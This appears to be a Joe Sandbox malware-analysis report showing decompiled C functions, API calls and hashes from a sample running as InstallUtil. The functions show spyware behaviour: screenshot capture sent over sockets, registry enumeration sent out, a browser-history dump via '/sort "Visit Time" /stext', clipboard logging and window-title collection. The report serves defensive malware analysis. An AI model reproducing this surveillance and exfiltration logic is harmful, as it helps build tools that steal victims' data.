Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 9269abf3446c0c407ed1a2d4036da59c5190ee49ce07a04b16f4a94a6885d453
Instruction ID: 089b301f4f2539066b24e1bb82f9127eab0f048afea1e0fd140412a00a45b79e
Opcode Fuzzy Hash: 9269abf3446c0c407ed1a2d4036da59c5190ee49ce07a04b16f4a94a6885d453
Instruction Fuzzy Hash: 2CC04C48600943702E583A7313421EE03545C5E3DCF92B8CFA9955B5179D0D041B6C7F

Uniqueness

Uniqueness Score: -1.00%

Function 00415388 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 288
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00415388(intOrPtr __ecx, void* __eflags, signed char _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v112;
				intOrPtr _v116;
				intOrPtr _v144;
				char _v176;
				char _v200;
				char _v204;
				char _v212;
				char _v224;
				void* _v228;
				char _v248;
				void* _v252;
				void* _v276;
				char _v288;
				char* _v304;
				intOrPtr _v308;
				char _v312;
				void* _v316;
				void* _v328;
				char _v332;
				char _v336;
				char _v340;
				char _v356;
				char _v360;
				void* _v364;
				void* _v388;
				intOrPtr _v428;
				signed int _v432;
				char _v448;
				char _v452;
				char _v456;
				intOrPtr _v464;
				signed int _v468;
				void* _v476;
				char _v480;
				char _v484;
				char _v500;
				char _v504;
				char _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t90;
				void* _t124;
				void* _t126;
				void* _t140;
				void* _t141;
				void* _t165;
				intOrPtr* _t166;
				intOrPtr _t167;
				char* _t174;
				intOrPtr _t245;
				intOrPtr _t258;
				intOrPtr* _t269;
				void* _t271;
				intOrPtr _t273;
				void* _t279;
				void* _t280;
				signed int _t281;
				void* _t283;
				void* _t284;

				_t283 = (_t281 & 0xfffffff8) - 0x1b4;
				_t245 = _a12;
				_push(_t165);
				_t273 = __ecx;
				 *0x46de68 = _t245;
				_push(_t245);
				_t246 = _a8;
				_v428 = __ecx;
				_v432 = _a4 & 0x000000ff;
				E0041578F( &_v356, _a8, __eflags);
				if(E0040243C() != 0) {
					_t174 =  &_v356;
					_t90 =  *0x46dd04(E00401F6B(_t174), E0040243C());
					_t166 = _t90;
					E004151A8( &_v340, _t166);
					E00415B45(L"image/jpeg",  &_v204);
					_v332 = 1;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v312 = 1;
					_v308 = 4;
					_v304 =  &_v448;
					_v452 = 0;
					_t269 =  *0x46dd04(0, 0, _t174);
					E0041523F( &_v212,  &_v356, _t269,  &_v212,  &_v340);
					 *((intOrPtr*)( *_t269 + 0x30))(_t269,  &_v112, 1);
					E004051E3(_t166,  &_v452,  &_v204, _t269, _t280, _v116, 0);
					asm("xorps xmm0, xmm0");
					asm("movlpd [esp+0x30], xmm0");
					 *((intOrPtr*)( *_t269 + 0x14))(_t269, _v468, _v464, 0, 0);
					_t276 =  *_t269;
					 *((intOrPtr*)( *_t269 + 0xc))(_t269, E00401F6B( &_v480), _v144, 0);
					 *((intOrPtr*)( *_t166 + 8))(_t166);
					 *((intOrPtr*)( *_t269 + 8))(_t269);
					E0043DDD1( &_v504, E0040243C(),  &_v524, 0xa);
					_t167 = _v528;
					_t284 = _t283 + 0xc;
					__eflags =  *((intOrPtr*)(_t167 + 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t167 + 4)) != 0xffffffff) {
						_t284 = _t284 - 0x18;
						E00402ED0(_t167, _t284, E004052F5( &_v456,  &_v500, _t280, 0x46e260), _t280, __eflags,  &_v480);
						_push(0x4d);
						_v540 = E00404A78(_t167, _t115, __eflags);
						goto L10;
					} else {
						E00404804(_t167);
						_t124 = E0040489F(_t167, _t276, _t167);
						__eflags = _t124;
						if(_t124 != 0) {
							E00404BBC(_t167, E00415E25);
							_t271 = _t167 + 0x80;
							_t126 = E0040ECD0(__eflags);
							_t284 = _t284 - 0x18;
							__eflags = _t126;
							_t279 = _t284;
							_push( &_v484);
							if(_t126 == 0) {
								E00402ED0(_t167, _t279, E00402ED0(_t167,  &_v456, E00402ED0(_t167,  &_v288, E00402ED0(_t167,  &_v312, E00402ED0(_t167,  &_v336, E004052F5( &_v360,  &_v500, _t280, 0x46e260), _t280, __eflags, _t271), _t280, __eflags, 0x46e260), _t280, __eflags, _t167 + 0x98), _t280, __eflags, 0x46e260), _t280, __eflags);
								_push(0x10);
								_v540 = E00404A78(_t167, _t133, __eflags);
								E00401F98();
								E00401F98();
								E00401F98();
								E00401F98();
							} else {
								_t140 = E004183E5( &_v456, 0x46e980);
								_t258 =  *0x46dd64; // 0x0
								_t141 = E004182D1(_t167,  &_v288, _t258);
								E00402ED0(_t167, _t279, E00402ED0(_t167,  &_v248, E00402E61( &_v224, E00402ED0(_t167,  &_v200, E00402E61( &_v176, E00402ED0(_t167,  &_v360, E00402ED0(_t167,  &_v336, E004052F5( &_v312,  &_v500, _t280, 0x46e260), _t280, __eflags, _t271), _t280, __eflags, 0x46e260), _t141), _t280, __eflags, 0x46e260), _t140), _t280, __eflags, 0x46e260), _t280, __eflags);
								_push(0x10);
								_v540 = E00404A78(_t167, _t149, __eflags);
								E00401F98();
								E00401F98();
								E00401F98();
								E00401F98();
								E00401F98();
								E00401F98();
								E00401F98();
								E00401F98();
								L10:
							}
							E00401F98();
						}
					}
					E004151CB(E00401F98(), _t284 + 0x78);
				} else {
					_t287 =  *((intOrPtr*)(_t273 + 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t273 + 4)) == 0xffffffff) {
						E00404804(_t273);
						E0040489F(_t273, _t273, _t273);
					}
					_t284 = _t283 - 0x18;
					E004020B6(_t165, _t284, _t246, _t287, _t273 + 0x80);
					_push(0x4e);
					E00404A78(_t273, _t246, _t287);
					_v468 = _v468 & 0x00000000;
				}
				E00401F98();
				return  *((intOrPtr*)(_t284 + 0x10));
			}

0x0041538e
0x00415394
0x0041539b
0x0041539e
0x004153a0
0x004153a6
0x004153a7
0x004153ae
0x004153b2
0x004153b6
0x004153c7
0x0041540c
0x00415416
0x0041541d
0x00415424
0x00415435
0x00415449
0x00415450
0x00415451
0x00415452
0x00415453
0x00415456
0x00415462
0x0041546e
0x00415475
0x0041547f
0x00415496
0x004154a8
0x004154b7
0x004154be
0x004154c3
0x004154d2
0x004154d5
0x004154eb
0x004154f1
0x004154f7
0x0041550b
0x00415510
0x00415514
0x00415517
0x0041551b
0x0041572a
0x0041574b
0x00415751
0x0041575a
0x00000000
0x00415521
0x00415523
0x0041552b
0x00415530
0x00415532
0x0041553f
0x00415544
0x00415551
0x00415556
0x00415559
0x0041555f
0x00415561
0x00415562
0x004156e1
0x004156e7
0x004156f4
0x004156f8
0x00415704
0x00415710
0x0041571c
0x00415568
0x00415576
0x0041557b
0x0041558e
0x0041560b
0x00415611
0x00415621
0x00415625
0x00415631
0x0041563d
0x00415649
0x00415655
0x00415661
0x0041566d
0x00415679
0x0041575e
0x0041575e
0x00415762
0x00415762
0x00415532
0x00415774
0x004153c9
0x004153c9
0x004153cd
0x004153d1
0x004153d9
0x004153d9
0x004153de
0x004153ea
0x004153ef
0x004153f3
0x004153f8
0x004153f8
0x0041577d
0x0041578c

APIs

Part of subcall function 0041578F: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004157A9
Part of subcall function 0041578F: CreateCompatibleDC.GDI32(00000000), ref: 004157B6

SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00415416
SHCreateMemStream.SHLWAPI(00000000), ref: 00415479

Part of subcall function 0040489F: connect.WS2_32(FFFFFFFF,?,?), ref: 004048B7

Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D

Strings

image/jpeg, xrefs: 00415430

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Create$Stream$Compatibleconnectsend
String ID: image/jpeg
API String ID: 516589181-3785015651
Opcode ID: 83ee22bbd1a34b9ee764d83720ab625f7214ed777109a353386459ed2cdc77f6
Instruction ID: 4058b72579c310cd81e2948a9c51c1c8e3e122ec86b96921c0c29db8d613141b
Opcode Fuzzy Hash: 83ee22bbd1a34b9ee764d83720ab625f7214ed777109a353386459ed2cdc77f6
Instruction Fuzzy Hash: 88A19F316083449BC324FB21D895AEFB3E5AFD5304F00493EB58A971D1EF789945CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0043ED1D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0043EDAD

Strings

pow, xrefs: 0043ED85, 0043EDA2

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 7466ca200bdf16320e5c9faf2f8782d7d1fa97e8da5c636b47dafc4924c5a37d
Instruction ID: 993812ce7a3d439e8a8fc006798ed59a631e5dedc3a56f6363c517c5d0bed230
Opcode Fuzzy Hash: 7466ca200bdf16320e5c9faf2f8782d7d1fa97e8da5c636b47dafc4924c5a37d
Instruction Fuzzy Hash: 8051506190920396EB127B16CD0637B3B949B44701F345D6BF0D5423E9EB3DCC95AA4F

Uniqueness

Uniqueness Score: -1.00%

Function 00411281 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00411281(short* __ecx, char __edx, void* __eflags, char _a4) {
				void* _v16;
				char _v28;
				char _v52;
				void* _v56;
				char _v76;
				void* _v80;
				char _v100;
				void* _v104;
				char _v124;
				void* _v128;
				char _v148;
				void* _v152;
				char _v172;
				void* _v176;
				char _v196;
				void* _v200;
				char _v220;
				void* _v224;
				char _v225;
				void* _v228;
				void* _v248;
				void* _v268;
				void* __ebx;
				void* __ebp;
				void* _t28;
				void* _t35;
				void* _t36;
				void* _t61;
				short* _t116;
				void* _t120;
				void* _t123;
				void* _t124;

				_t103 = __edx;
				_t123 =  &_v228 - 0x18;
				_v225 = __edx;
				_t116 = __ecx;
				E004020B6(_t61, _t123, __edx, __eflags,  &_a4);
				_t28 = E004111F0(_t61, __eflags);
				_t124 = _t123 + 0x18;
				_t62 = 0;
				if(RegOpenKeyExW(_t28, _t116, 0, 0x20019,  &_v228) != 0) {
					E00402053(0, _t124 - 0x18, _t103, _t120, "3");
					_push(0x72);
					E00404A78(0x46e7b8, _t103, __eflags);
				} else {
					E00410FC9(_v224, _t103);
					_t35 = E00418445(0,  &_v28, 0x46e788);
					_t36 = E00418445(0x46e770,  &_v52, 0x46e770);
					_t129 = _v225;
					_t107 =  ==  ? "0" : "1";
					_t114 = E00402ED0(0x46e770,  &_v220, E00402ED0(0x46e770,  &_v196, E00402ED0(0x46e770,  &_v172, E00402E61( &_v148, E00402ED0(0x46e770,  &_v124, E00402E61( &_v100, E004052F5( &_v76,  ==  ? "0" : "1", 0x46e788, 0x46e260), _t36), 0x46e788, _v225, 0x46e260), _t35), 0x46e788, _v225, 0x46e260), 0x46e788, _v225, 0x46e7a0), 0x46e788, _t129, 0x46e260);
					E00402ED0(0x46e770, _t124 - 0x18, _t44, 0x46e788, _t129, 0x46e838);
					_push(0x71);
					E00404A78(0x46e7b8, _t44, _t129);
					E00401F98();
					E00401F98();
					E00401F98();
					E00401F98();
					E00401F98();
					E00401F98();
					E00401F98();
					E00401F98();
					E00401F98();
					L00409F8A(0x46e770, 0x46e788, _t44, 0x4610ec);
					L00409F8A(0x46e770, 0x46e770, _t114, 0x4610ec);
					L00405A7D(0x46e770, 0x46e7a0, _t114, 0x461084);
					L00405A7D(0x46e770, 0x46e838, _t114, 0x461084);
					RegCloseKey(_v268);
					_t62 = 1;
				}
				E00401F98();
				return _t62;
			}

0x00411281
0x0041128b
0x0041128e
0x00411292
0x0041129e
0x004112a3
0x004112a8
0x004112af
0x004112c2
0x0041143c
0x00411441
0x00411448
0x004112c8
0x004112cc
0x004112f5
0x0041130a
0x0041130f
0x00411327
0x00411381
0x00411385
0x0041138b
0x00411392
0x0041139b
0x004113a4
0x004113ad
0x004113b6
0x004113bf
0x004113cb
0x004113d7
0x004113e3
0x004113ef
0x004113fc
0x00411404
0x00411414
0x0041141f
0x00411428
0x0041142e
0x0041142e
0x00411454
0x00411465

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 004112BA

Part of subcall function 00410FC9: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00411030
Part of subcall function 00410FC9: RegEnumKeyExW.ADVAPI32 ref: 0041105F

Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D

RegCloseKey.ADVAPI32(00000000,00461084,00461084,004610EC,004610EC,00000071), ref: 00411428

Strings

`F, xrefs: 00411397

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: `F
API String ID: 3114080316-3520748611
Opcode ID: adad6ade140c573f75862a222352a099cfa88a94b3371173b29bec94d9a321c8
Instruction ID: f02e223a6181902d2c2455f7e3c70963f1e794a1f5a9acb1261d3f965fe014ae
Opcode Fuzzy Hash: adad6ade140c573f75862a222352a099cfa88a94b3371173b29bec94d9a321c8
Instruction Fuzzy Hash: E641BC306082445AC324F726D856AEF7395AF92348F40483FB146A31E2EF38594AC69F

Uniqueness

Uniqueness Score: -1.00%

Function 0043FDB8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FE8E

Strings

R@, xrefs: 0043FDCF
<@, xrefs: 0043FE39

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free
String ID: <@$R@
API String ID: 269201875-1363467631
Opcode ID: 0eb04e60c130fb67d0308cf5eab7e9a5277a4a3e363255724a29e7ea33b8f328
Instruction ID: 239a96016a45d6f290135f0482fc91260e97591c8cbd1ad33fca869b2c1eb28b
Opcode Fuzzy Hash: 0eb04e60c130fb67d0308cf5eab7e9a5277a4a3e363255724a29e7ea33b8f328
Instruction Fuzzy Hash: B1418C32B00714CFCB18DFA9D8C196EB7B1EB8D320B1581AAE515EB3A1D7349C45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040400C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93
sleepCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040400C(void* __ebx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __edi;
				void* __ebp;
				struct HINSTANCE__* _t81;
				struct HINSTANCE__* _t84;
				void* _t85;
				void* _t86;

				_t48 = __ebx;
				_t81 = 0;
				GetModuleFileNameW(0,  &_v692, 0x104);
				E0040209F(__ebx,  &_v52);
				E00419012( &_v28, 0x30, E00401F6B(E00418114( &_v76)));
				E00401F98();
				E00401F6B(0x46e1b0);
				E004150C2(E00401EC4(E00402FD4(_t48,  &_v100, E004042DD(_t48,  &_v124, E004042BC(_t48,  &_v148,  &_v692, _t85, 0, E0040413E(__ebx,  &_v172, 0x30, _t85, L" /sort \"Visit Time\" /stext \"")), _t85, 0,  &_v28), 0, _t85, 0, "\"")));
				E00401EC9();
				E00401EC9();
				E00401EC9();
				E00401EC9();
				_t84 = 0;
				while(1) {
					E00401EC4( &_v28);
					_t80 =  &_v52;
					if(E004189A5( &_v52) != 0) {
						break;
					}
					Sleep(0xfa);
					_t84 =  &(_t84->i);
					if(_t84 < 0x14) {
						continue;
					} else {
					}
					L5:
					E00401EC9();
					E00401F98();
					return _t81;
				}
				E004020B6(_t48, _t86 - 0x18,  &_v52, __eflags,  &_v52);
				_push(0x9d);
				E00404A78(0x46e130, _t80, __eflags);
				_t81 = 1;
				__eflags = 1;
				goto L5;
			}

0x0040400c
0x00404023
0x00404026
0x0040402f
0x00404049
0x00404052
0x0040405c
0x004040b0
0x004040b8
0x004040c0
0x004040cb
0x004040d6
0x004040db
0x004040dd
0x004040e0
0x004040e5
0x004040f1
0x00000000
0x00000000
0x004040f8
0x004040fe
0x00404102
0x00000000
0x00000000
0x00404104
0x00404126
0x00404129
0x00404131
0x0040413d
0x0040413d
0x0040410f
0x00404114
0x0040411e
0x00404125
0x00404125
0x00000000

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404026

Part of subcall function 00418114: GetCurrentProcessId.KERNEL32(00000000,76F1FBB0,00000000,?,?,?,?,004610EC,0040B043,.vbs,?,?,?,?,?,0046E5A0), ref: 0041813B

Part of subcall function 004150C2: CloseHandle.KERNEL32(004040B5,?,004040B5,00460E24), ref: 004150D8
Part of subcall function 004150C2: CloseHandle.KERNEL32(00460E24,?,004040B5,00460E24), ref: 004150E1

Part of subcall function 004189A5: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00408F6D), ref: 004189BE

Sleep.KERNEL32(000000FA,00460E24), ref: 004040F8

Strings

/sort "Visit Time" /stext ", xrefs: 00404072

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "
API String ID: 368326130-1573945896
Opcode ID: 582886a25ec431a6a9968fc70793b2aaa12c77b31c401f2cebf02ef1c28a8f56
Instruction ID: b031e74bed0b396cb6902618a6d910056206179634ae4f3c8ca1473975d0df44
Opcode Fuzzy Hash: 582886a25ec431a6a9968fc70793b2aaa12c77b31c401f2cebf02ef1c28a8f56
Instruction Fuzzy Hash: 83317071A102195ACB14F7B6DC569EE73B5AF91308F00047FF506B71D2EF38198ACA99

Uniqueness

Uniqueness Score: -1.00%

Function 0044D8A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 93%

			E0044D8A8(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				void* __esi;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t36;

				_push(__ecx);
				_t23 = _a4;
				_push(_t34);
				if(_t23 == 0) {
					L21:
					_t15 = E0044492D(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t34 = 0x45b2f8;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t34) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t36 = 0x45b300;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t36) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t48 = _t17;
								if(_t17 != 0) {
									_t16 = E004383C2(_t23, _t23);
									goto L25;
								}
								if(E0044492D(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t36 = _t36 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t34 = _t34 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}

0x0044d8ad
0x0044d8ae
0x0044d8b1
0x0044d8b5
0x0044d95b
0x0044d96f
0x0044d974
0x0044d976
0x0044d97c
0x0044d97f
0x0044d981
0x0044d983
0x0044d983
0x0044d989
0x0044d98e
0x0044d98e
0x0044d978
0x0044d978
0x00000000
0x0044d978
0x0044d8bb
0x0044d8c0
0x00000000
0x00000000
0x0044d8c6
0x0044d8cb
0x0044d8cd
0x0044d8cd
0x0044d8d3
0x00000000
0x00000000
0x0044d8d8
0x0044d8ef
0x0044d8ef
0x0044d8f8
0x0044d8fa
0x00000000
0x00000000
0x0044d8fc
0x0044d901
0x0044d903
0x0044d903
0x0044d909
0x00000000
0x00000000
0x0044d90e
0x0044d92c
0x0044d92c
0x0044d92e
0x0044d953
0x00000000
0x0044d958
0x0044d94b
0x00000000
0x00000000
0x0044d94d
0x00000000
0x0044d94d
0x0044d910
0x0044d918
0x00000000
0x00000000
0x0044d91a
0x0044d91d
0x0044d923
0x00000000
0x00000000
0x00000000
0x0044d925
0x0044d927
0x0044d929
0x0044d929
0x00000000
0x0044d929
0x0044d8da
0x0044d8e2
0x00000000
0x00000000
0x0044d8e4
0x0044d8e7
0x0044d8ed
0x00000000
0x00000000
0x00000000
0x0044d8ed
0x0044d8f3
0x0044d8f5
0x0044d8f5
0x00000000

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044DB03,?,00000050,?,?,?,?,?), ref: 0044D983

Strings

OCP, xrefs: 0044D8FC
ACP, xrefs: 0044D8C6

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 187f9a954186ed601c69536ca0f0e8db646af36685fb63c4031eb86ad161f795
Instruction ID: d97db5b55563d882cb1f03f0d55d669f44e4725deecd1e114deb8eb659ded43a
Opcode Fuzzy Hash: 187f9a954186ed601c69536ca0f0e8db646af36685fb63c4031eb86ad161f795
Instruction Fuzzy Hash: 762103E2E00205E6FB249E65C801BA7B3A6EF54B14F16853BE90AD7300E73ADD41C398

Uniqueness

Uniqueness Score: -1.00%

Function 00409DD6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00409DD6(void* __ecx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t23;
				void* _t27;
				void* _t30;
				void* _t78;
				void* _t84;
				void* _t85;
				void* _t86;

				_t86 = _t85 - 0x94;
				_t78 = __ecx;
				if( *0x46ff84 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E00430D17(0x46ff84);
					_t89 =  *0x46ff84 - 0xffffffff;
					if( *0x46ff84 == 0xffffffff) {
						E00401F46(0x46ff88, 0x46ff88);
						E004310BE(_t89, E00453D3C);
						E00430CD8(0x46ff84, 0x46ff84);
					}
				}
				E00409D9C( &_v28);
				_t23 = E0040A060(0x46ff88);
				_t90 = _t23;
				if(_t23 == 0) {
					E00409F8F(0x46ff88,  &_v28);
					_t27 = E004078C9(_t90);
					_t91 = _t27;
					if(_t27 != 0) {
						E00402053(0x46ff88,  &_v76, 0x4610ec, _t84, "\r\n[End of clipboard]\r\n");
						E00402053(0x46ff88,  &_v52, 0x4610ec, _t84, "\r\n[Text copied to clipboard]\r\n");
						_t30 = E00418385( &_v148,  &_v76);
						E00402F65(_t86 - 0x18, E004042DD(0x46ff88,  &_v100, E00418385( &_v124,  &_v52), _t84, _t91, 0x46ff88), _t30);
						E00408D60(_t78);
						E00401EC9();
						E00401EC9();
						E00401EC9();
						E00401F98();
						E00401F98();
					}
				}
				return E00401EC9();
			}

0x00409ddf
0x00409df4
0x00409dfc
0x00409e04
0x00409e09
0x00409e11
0x00409e15
0x00409e1f
0x00409e25
0x00409e2b
0x00409e11
0x00409e30
0x00409e3a
0x00409e3f
0x00409e41
0x00409e4d
0x00409e5a
0x00409e5f
0x00409e61
0x00409e6f
0x00409e7c
0x00409e8a
0x00409eb0
0x00409eb8
0x00409ec0
0x00409ec8
0x00409ed3
0x00409edb
0x00409ee3
0x00409ee3
0x00409e61
0x00409ef6

APIs

Part of subcall function 004310BE: __onexit.LIBCMT ref: 004310C4

__Init_thread_footer.LIBCMT ref: 00409E25

Strings

[Text copied to clipboard], xrefs: 00409E74
[End of clipboard], xrefs: 00409E67

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: 5270eb18190829998c5ee4afee35cb001490fc847153f81b8fba0dfd99147eb9
Instruction ID: 27ac64323c14a5b5afec18ba9529d964e25902238e7a433e078a36faa8fe32bc
Opcode Fuzzy Hash: 5270eb18190829998c5ee4afee35cb001490fc847153f81b8fba0dfd99147eb9
Instruction Fuzzy Hash: 85217F31A101094ACB08FB65E8929EEB379AF55308F50017FF501771E3EF385D4A869D

Uniqueness

Uniqueness Score: -1.00%

Function 00414587 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00414587(void* __edx, void* __edi, struct HWND__* _a4) {
				short _v604;
				char _v632;
				void* _v636;
				char _v656;
				void* _v660;
				char _v680;
				void* _v684;
				char _v704;
				void* _v708;
				char _v728;
				void* _v732;
				char _v752;
				void* _v756;
				char _v776;
				void* _v780;
				char _v796;
				char _v800;
				void* _v804;
				char _v808;
				char _v812;
				void* __ebx;
				void* __ebp;
				void* _t34;
				signed int _t53;
				void* _t79;
				void* _t88;

				_t87 = __edi;
				_t79 = __edx;
				_push(_t53);
				GetWindowTextW(_a4,  &_v604, 0x12c);
				_t93 = IsWindowVisible(_a4);
				_t54 = _t53 & 0xffffff00 | IsWindowVisible(_a4) != 0x00000000;
				E00411B96( &_v808, "%i", _a4);
				E0040413E(_t53 & 0xffffff00 | IsWindowVisible(_a4) != 0x00000000,  &_v796, _t79, _t88,  &_v604);
				_t34 = E00418445(_t54,  &_v632,  &_v800);
				_t12 =  &_v812; // 0x46737c
				L00403336(E0040793B(_t54,  &_v776, E00402E61( &_v752, E0040793B(_t54,  &_v728, E0040793B(_t54,  &_v704, E0040793B(_t54,  &_v680, E004182D1(_t54,  &_v656, _t54 & 0x000000ff), __edi, _t88, _t93, 0x46737c), __edi, _t88, _t93, _t12), _t87, _t88, _t93, 0x46737c), _t34), _t87, _t88, _t93, 0x467228));
				E00401F98();
				E00401F98();
				E00401F98();
				E00401F98();
				E00401F98();
				E00401F98();
				E00401F98();
				E00401EC9();
				return 1;
			}

0x00414587
0x00414587
0x0041459a
0x004145a4
0x004145b6
0x004145c2
0x004145c5
0x004145d9
0x004145ee
0x004145fd
0x00414657
0x00414660
0x00414669
0x00414672
0x0041467b
0x00414687
0x00414693
0x0041469f
0x004146a8
0x004146b4

APIs

GetWindowTextW.USER32 ref: 004145A4
IsWindowVisible.USER32(?), ref: 004145AD

Strings

|sF, xrefs: 004145FD, 00414601

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Window$TextVisible
String ID: |sF
API String ID: 1670992164-956794550
Opcode ID: 3400abf12a70da47d4fed9586d227fb93eb7beee062b89c6d042c1fe71282703
Instruction ID: 27ebeaa6ea1a3d25e70583192487b33e816497d2748b4b703055b86ca9857c48
Opcode Fuzzy Hash: 3400abf12a70da47d4fed9586d227fb93eb7beee062b89c6d042c1fe71282703
